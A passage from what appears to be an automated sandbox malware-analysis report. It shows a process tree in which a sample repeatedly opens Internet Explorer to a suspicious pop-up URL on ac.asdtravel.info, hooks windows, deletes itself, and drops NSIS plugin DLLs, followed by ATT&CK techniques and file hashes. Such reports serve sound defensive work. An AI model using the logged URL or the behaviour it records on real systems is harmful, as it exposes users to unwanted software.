    - Suspicious use of WriteProcessMemory
    PID:388
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:388 CREDAT:17410 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2432
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.asdtravel.info:251/popopo.php?gg=a1&tt=919&ur=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1896
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.asdtravel.info:251/popopo.php?gg=a1&tt=919&ur=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
    3⤵
    PID:3256
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.asdtravel.info:251/popopo.php?gg=a2&tt=919&ur=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1300
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.asdtravel.info:251/popopo.php?gg=a2&tt=919&ur=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4932
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4932 CREDAT:17410 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1076
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4932 CREDAT:17416 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2264
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4932 CREDAT:17422 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:3732
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4932 CREDAT:17432 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:3360
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4932 CREDAT:17438 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1536
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4932 CREDAT:17448 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:3584
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.asdtravel.info:251/popopo.php?gg=a3&tt=919&ur=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4284
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.asdtravel.info:251/popopo.php?gg=a3&tt=919&ur=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
    3⤵
    PID:4936
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.asdtravel.info:251/popopo.php?gg=a4&tt=919&ur=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2480
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.asdtravel.info:251/popopo.php?gg=a4&tt=919&ur=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
    3⤵
    PID:3440
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.asdtravel.info:251/popopo.php?gg=a5&tt=919&ur=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3636
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.asdtravel.info:251/popopo.php?gg=a5&tt=919&ur=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
    3⤵
    - Modifies Internet Explorer settings
    PID:4336
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.asdtravel.info:251/popopo.php?gg=a6&tt=919&ur=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4968
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.asdtravel.info:251/popopo.php?gg=a6&tt=919&ur=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
    3⤵
    PID:4120
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.asdtravel.info:251/popopo.php?gg=a7&tt=919&ur=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4524
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.asdtravel.info:251/popopo.php?gg=a7&tt=919&ur=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
    3⤵
    PID:2060
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.asdtravel.info:251/popopo.php?gg=a8&tt=919&ur=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:680
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.asdtravel.info:251/popopo.php?gg=a8&tt=919&ur=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
    3⤵
    PID:2368
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.asdtravel.info:251/popopo.php?gg=a9&tt=919&ur=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
  2⤵
  - System Location Discovery: System Language Discovery
  PID:64
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.asdtravel.info:251/popopo.php?gg=a9&tt=919&ur=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
    3⤵
    - Modifies Internet Explorer settings
    PID:3056
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.asdtravel.info:251/popopo.php?gg=a10&tt=919&ur=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2784
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.asdtravel.info:251/popopo.php?gg=a10&tt=919&ur=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
    3⤵
    - Modifies Internet Explorer settings
    PID:3664
- C:\Program Files (x86)\Internet Explorer\iexplore.exe
  "C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://ac.asdtravel.info:251/popopo.php?gg=a11&tt=919&ur=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1768
- - C:\Program Files\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://ac.asdtravel.info:251/popopo.php?gg=a11&tt=919&ur=JaffaCakes118&66dd452da8f7726c8f0eeda8517a8bf2090df582
    3⤵
    - Modifies Internet Explorer settings
    PID:3912
- C:\Windows\SysWOW64\explorer.exe
  explorer.exe
  2⤵
  - Deletes itself
  - System Location Discovery: System Language Discovery
  PID:4548

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
471B

MD5
33bac9325241193616461afd5a0deb0c

SHA1
e78ed72996568bc9616f4d6b20403749252b4859

SHA256
cb0b78d15b774b91ab6f6ef315a14f301b85b40122a72622818753212538f5b7

SHA512
3054cbd1551e36a747fc4c7086d3cc484530ea13d44279b4f5f92d462d91d7e3322bb240edeedd517751c00949a6264b50322464e446290726fde18ac4eb2e2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
404B

MD5
8a7e75089bcc9c2a58a3706ef705da5a

SHA1
bf411cbb730960799b32fa1af2465a8aabc2e3ba

SHA256
1fbc097fb4f238ec6bb785fb68777ed20f10ddb667f12cf873bed0da62ebb7a4

SHA512
09cba1ad591ffbb39acf54f85720ca6dcfb196cb52b5d3b5d7da737fae910f6f8078cd5c382e0465225314a29898d9aef66b6e80c0573264c2f91393667fdc2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B1B57504-763C-11EF-98CC-FA5B96DB06CB}.dat

Filesize
5KB

MD5
5cdcba02fc2bb06a6b14d516df9a1861

SHA1
4855ac7b5718bc8921cbfe57b0b6fc06e61c104c

SHA256
8571609e86c8e95ec906e4fa06f36336fc11ced2a11c0cccf81c3a1ba559c8f2

SHA512
011ba1511ec81f5cfd4284e9337cb3ad1ffb87636e739e4fbe5c5f4cf9ffa661e5329278ff28bb622d61e784c3b55336bb1a0436904cb8b51ee993edb4963a2e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6809OHQ0\httpErrorPagesScripts[1]

Filesize
11KB

MD5
9234071287e637f85d721463c488704c

SHA1
cca09b1e0fba38ba29d3972ed8dcecefdef8c152

SHA256
65cc039890c7ceb927ce40f6f199d74e49b8058c3f8a6e22e8f916ad90ea8649

SHA512
87d691987e7a2f69ad8605f35f94241ab7e68ad4f55ad384f1f0d40dc59ffd1432c758123661ee39443d624c881b01dcd228a67afb8700fe5e66fc794a6c0384

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6809OHQ0\suggestions[1].en-US

Filesize
17KB

MD5
5a34cb996293fde2cb7a4ac89587393a

SHA1
3c96c993500690d1a77873cd62bc639b3a10653f

SHA256
c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

SHA512
e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8M42AOWL\NewErrorPageTemplate[1]

Filesize
1KB

MD5
dfeabde84792228093a5a270352395b6

SHA1
e41258c9576721025926326f76063c2305586f76

SHA256
77b138ab5d0a90ff04648c26addd5e414cc178165e3b54a4cb3739da0f58e075

SHA512
e256f603e67335151bb709294749794e2e3085f4063c623461a0b3decbcca8e620807b707ec9bcbe36dcd7d639c55753da0495be85b4ae5fb6bfc52ab4b284fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\NUB8HZ4Z\down[1]

Filesize
748B

MD5
c4f558c4c8b56858f15c09037cd6625a

SHA1
ee497cc061d6a7a59bb66defea65f9a8145ba240

SHA256
39e7de847c9f731eaa72338ad9053217b957859de27b50b6474ec42971530781

SHA512
d60353d3fbea2992d96795ba30b20727b022b9164b2094b922921d33ca7ce1634713693ac191f8f5708954544f7648f4840bcd5b62cb6a032ef292a8b0e52a44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\NUB8HZ4Z\errorPageStrings[1]

Filesize
4KB

MD5
d65ec06f21c379c87040b83cc1abac6b

SHA1
208d0a0bb775661758394be7e4afb18357e46c8b

SHA256
a1270e90cea31b46432ec44731bf4400d22b38eb2855326bf934fe8f1b169a4f

SHA512
8a166d26b49a5d95aea49bc649e5ea58786a2191f4d2adac6f5fbb7523940ce4482d6a2502aa870a931224f215cb2010a8c9b99a2c1820150e4d365cab28299e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VKVWVXN7\dnserror[2]

Filesize
2KB

MD5
2dc61eb461da1436f5d22bce51425660

SHA1
e1b79bcab0f073868079d807faec669596dc46c1

SHA256
acdeb4966289b6ce46ecc879531f85e9c6f94b718aab521d38e2e00f7f7f7993

SHA512
a88becb4fbddc5afc55e4dc0135af714a3eec4a63810ae5a989f2cecb824a686165d3cedb8cbd8f35c7e5b9f4136c29dea32736aabb451fe8088b978b493ac6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz6C77.tmp\Math.dll

Filesize
66KB

MD5
9eb6cecdd0df9fe32027fcdb51c625af

SHA1
52b5b054ff6e7325c3087822901ea2f2c4f9572a

SHA256
54cf1572ed47f614b0ffb886c99fc5725f454ef7ff919fbb2fd13d1cbe270560

SHA512
864742ec6f74f94057b54cd9b09707c0125ac8db4844fa80af201e8b72a811bb68276c993e75bce67e5ece4f83644572edbdee5e963634c5a37839615faea97a

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz6C77.tmp\SelfDel.dll

Filesize
4KB

MD5
5e14f6774c43bdff6ffe0afb0d51c47f

SHA1
fb1e7b6e63afa6db6aa2033b5e7e90f1f4ba5e27

SHA256
7cb51ccf21655e9590a6c3232920b16a3dfef15ffe9df7b8e71f487ca8c24da9

SHA512
6ac533c0485156a68bd1460d8219acf7539b766590910cd646f4d7d4572c072f45369712d88d4e698f4e94aead8082abcbfacc3d6fe890046898f6c6d85274e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz6C77.tmp\System.dll

Filesize
11KB

MD5
00a0194c20ee912257df53bfe258ee4a

SHA1
d7b4e319bc5119024690dc8230b9cc919b1b86b2

SHA256
dc4da2ccadb11099076926b02764b2b44ad8f97cd32337421a4cc21a3f5448f3

SHA512
3b38a2c17996c3b77ebf7b858a6c37415615e756792132878d8eddbd13cb06710b7da0e8b58104768f8e475fc93e8b44b3b1ab6f70ddf52edee111aaf5ef5667

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz6C77.tmp\inetc.dll

Filesize
20KB

MD5
50fdadda3e993688401f6f1108fabdb4

SHA1
04a9ae55d0fb726be49809582cea41d75bf22a9a

SHA256
6d6ddc0d2b7d59eb91be44939457858ced5eb23cf4aa93ef33bb600eb28de6f6

SHA512
e9628870feea8c3aaefe22a2af41cf34b1c1778c4a0e81d069f50553ce1a23f68a0ba74b296420b2be92425d4995a43e51c018c2e8197ec2ec39305e87c56be8

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz6C77.tmp\time.dll

Filesize
10KB

MD5
38977533750fe69979b2c2ac801f96e6

SHA1
74643c30cda909e649722ed0c7f267903558e92a

SHA256
b4a95a455e53372c59f91bc1b5fb9e5c8e4a10a506fa04aaf7be27048b30ae35

SHA512
e17069395ad4a17e24f7cd3c532670d40244bd5ae3887c82e3b2e4a68c250cd55e2d8b329d6ff0e2d758955ab7470534e6307779e49fe331c1fd2242ea73fd53

Download Submit
memory/2780-10-0x0000000002800000-0x000000000281A000-memory.dmp

Filesize
104KB

Download